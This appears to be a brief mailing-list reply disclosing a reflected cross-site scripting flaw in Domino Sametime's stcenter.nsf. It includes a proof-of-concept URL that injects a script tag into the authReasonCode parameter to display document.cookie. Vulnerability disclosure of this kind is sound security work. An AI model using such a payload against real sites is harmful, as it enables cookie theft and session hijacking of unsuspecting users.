Hi,
I discovered similar XSS affecting Domino Sametime some time agoβ¦
This XSS affects other scripts alsoβ¦
i.e. stcenter.nsf
Here's an example:
/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"
Cheers
Andrew